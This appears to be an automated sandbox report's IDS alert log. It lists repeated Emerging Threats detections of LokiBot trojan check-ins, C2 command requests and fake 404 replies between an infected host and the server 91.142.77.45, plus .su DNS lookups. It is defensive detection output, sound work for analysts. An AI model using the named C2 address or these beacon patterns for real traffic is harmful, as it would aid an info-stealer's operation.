Timestamp:	192.168.2.691.142.77.4549740802024313 11/03/22-12:31:37.627027
SID:	2024313
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549717802025381 11/03/22-12:30:35.019960
SID:	2025381
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549734802024318 11/03/22-12:31:25.377976
SID:	2024318
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497372025483 11/03/22-12:31:32.671321
SID:	2025483
Source Port:	80
Destination Port:	49737
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549716802825766 11/03/22-12:30:32.992651
SID:	2825766
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549722802825766 11/03/22-12:30:50.822444
SID:	2825766
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549722802021641 11/03/22-12:30:50.822444
SID:	2021641
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549740802024318 11/03/22-12:31:37.627027
SID:	2024318
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497402025483 11/03/22-12:31:39.620076
SID:	2025483
Source Port:	80
Destination Port:	49740
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859082532014169 11/03/22-12:30:20.174105
SID:	2014169
Source Port:	59082
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851530532014169 11/03/22-12:30:41.510499
SID:	2014169
Source Port:	51530
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549709802024313 11/03/22-12:30:16.075566
SID:	2024313
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860032532014169 11/03/22-12:31:29.125849
SID:	2014169
Source Port:	60032
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497152025483 11/03/22-12:30:32.611167
SID:	2025483
Source Port:	80
Destination Port:	49715
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549738802021641 11/03/22-12:31:33.019427
SID:	2021641
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549715802024313 11/03/22-12:30:31.132672
SID:	2024313
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497262025483 11/03/22-12:31:00.653288
SID:	2025483
Source Port:	80
Destination Port:	49726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549709802024318 11/03/22-12:30:16.075566
SID:	2024318
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858917532014169 11/03/22-12:31:03.812359
SID:	2014169
Source Port:	58917
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549718802024318 11/03/22-12:30:37.003049
SID:	2024318
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549721802024313 11/03/22-12:30:48.032802
SID:	2024313
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549729802825766 11/03/22-12:31:05.707382
SID:	2825766
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549719802025381 11/03/22-12:30:42.564459
SID:	2025381
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549721802024318 11/03/22-12:30:48.032802
SID:	2024318
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549718802024313 11/03/22-12:30:37.003049
SID:	2024313
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549714802825766 11/03/22-12:30:27.432237
SID:	2825766
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549736802024313 11/03/22-12:31:29.221112
SID:	2024313
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549732802825766 11/03/22-12:31:20.467945
SID:	2825766
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549743802021641 11/03/22-12:31:43.782645
SID:	2021641
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549740802025381 11/03/22-12:31:37.627027
SID:	2025381
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549722802025381 11/03/22-12:30:50.822444
SID:	2025381
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549742802825766 11/03/22-12:31:41.893270
SID:	2825766
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549731802024318 11/03/22-12:31:09.511791
SID:	2024318
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497432025483 11/03/22-12:31:45.271881
SID:	2025483
Source Port:	80
Destination Port:	49743
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497452025483 11/03/22-12:31:52.163667
SID:	2025483
Source Port:	80
Destination Port:	49745
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549731802024313 11/03/22-12:31:09.511791
SID:	2024313
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497412025483 11/03/22-12:31:41.587643
SID:	2025483
Source Port:	80
Destination Port:	49741
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549714802025381 11/03/22-12:30:27.432237
SID:	2025381
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549713802024318 11/03/22-12:30:25.414440
SID:	2024318
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549737802025381 11/03/22-12:31:31.046497
SID:	2025381
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549709802025381 11/03/22-12:30:16.075566
SID:	2025381
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549737802825766 11/03/22-12:31:31.046497
SID:	2825766
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549736802024318 11/03/22-12:31:29.221112
SID:	2024318
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549732802025381 11/03/22-12:31:20.467945
SID:	2025381
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549719802825766 11/03/22-12:30:42.564459
SID:	2825766
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863229532014169 11/03/22-12:30:32.906943
SID:	2014169
Source Port:	63229
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549741802024318 11/03/22-12:31:39.946873
SID:	2024318
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549744802024318 11/03/22-12:31:45.577786
SID:	2024318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849786532014169 11/03/22-12:30:06.615613
SID:	2014169
Source Port:	49786
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549730802025381 11/03/22-12:31:07.626823
SID:	2025381
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549744802024313 11/03/22-12:31:45.577786
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549738802024318 11/03/22-12:31:33.019427
SID:	2024318
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549727802025381 11/03/22-12:31:01.987085
SID:	2025381
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856123532014169 11/03/22-12:31:32.930668
SID:	2014169
Source Port:	56123
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549724802025381 11/03/22-12:30:54.913991
SID:	2025381
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549741802024313 11/03/22-12:31:39.946873
SID:	2024313
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549716802024313 11/03/22-12:30:32.992651
SID:	2024313
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549713802021641 11/03/22-12:30:25.414440
SID:	2021641
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549723802021641 11/03/22-12:30:53.367985
SID:	2021641
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549707802021641 11/03/22-12:30:11.977904
SID:	2021641
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549712802825766 11/03/22-12:30:22.162497
SID:	2825766
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549711802024318 11/03/22-12:30:20.264286
SID:	2024318
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549709802825766 11/03/22-12:30:16.075566
SID:	2825766
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549728802021641 11/03/22-12:31:03.903902
SID:	2021641
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549711802024313 11/03/22-12:30:20.264286
SID:	2024313
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549706802825766 11/03/22-12:30:09.785093
SID:	2825766
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549708802024313 11/03/22-12:30:14.035064
SID:	2024313
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549729802025381 11/03/22-12:31:05.707382
SID:	2025381
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549708802024318 11/03/22-12:30:14.035064
SID:	2024318
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497172025483 11/03/22-12:30:36.516442
SID:	2025483
Source Port:	80
Destination Port:	49717
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549716802024318 11/03/22-12:30:32.992651
SID:	2024318
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549739802825766 11/03/22-12:31:35.606377
SID:	2825766
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.865044532014169 11/03/22-12:31:27.427876
SID:	2014169
Source Port:	65044
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549745802021641 11/03/22-12:31:50.569101
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549745802825766 11/03/22-12:31:50.569101
SID:	2825766
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549734802825766 11/03/22-12:31:25.377976
SID:	2825766
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549710802021641 11/03/22-12:30:18.297577
SID:	2021641
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497132025483 11/03/22-12:30:26.998667
SID:	2025483
Source Port:	80
Destination Port:	49713
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549740802825766 11/03/22-12:31:37.627027
SID:	2825766
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549733802024313 11/03/22-12:31:22.614964
SID:	2024313
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549738802024313 11/03/22-12:31:33.019427
SID:	2024313
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549715802021641 11/03/22-12:30:31.132672
SID:	2021641
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856086532014169 11/03/22-12:30:57.832797
SID:	2014169
Source Port:	56086
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549733802024318 11/03/22-12:31:22.614964
SID:	2024318
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497282025483 11/03/22-12:31:05.359036
SID:	2025483
Source Port:	80
Destination Port:	49728
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497202025483 11/03/22-12:30:47.547245
SID:	2025483
Source Port:	80
Destination Port:	49720
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 91.142.77.45 - Destination IP: 192.168.2.6

Timestamp:	91.142.77.45192.168.2.680497242025483 11/03/22-12:30:57.636605
SID:	2025483
Source Port:	80
Destination Port:	49724
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549735802025381 11/03/22-12:31:27.516452
SID:	2025381
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549727802021641 11/03/22-12:31:01.987085
SID:	2021641
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549720802825766 11/03/22-12:30:45.793165
SID:	2825766
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854903532014169 11/03/22-12:30:36.914690
SID:	2014169
Source Port:	54903
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549718802021641 11/03/22-12:30:37.003049
SID:	2021641
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549739802024313 11/03/22-12:31:35.606377
SID:	2024313
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549736802021641 11/03/22-12:31:29.221112
SID:	2021641
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549739802024318 11/03/22-12:31:35.606377
SID:	2024318
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549717802825766 11/03/22-12:30:35.019960
SID:	2825766
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549725802025381 11/03/22-12:30:57.918358
SID:	2025381
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856547532014169 11/03/22-12:30:59.560048
SID:	2014169
Source Port:	56547
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549734802025381 11/03/22-12:31:25.377976
SID:	2025381
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.6 - Destination IP: 91.142.77.45

Timestamp:	192.168.2.691.142.77.4549716802025381 11/03/22-12:30:32.992651
SID:	2025381
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query for .su TLD (Soviet Union) Often Malware Related - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859504532014169 11/03/22-12:30:22.044585
SID:	2014169
Source Port:	59504
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

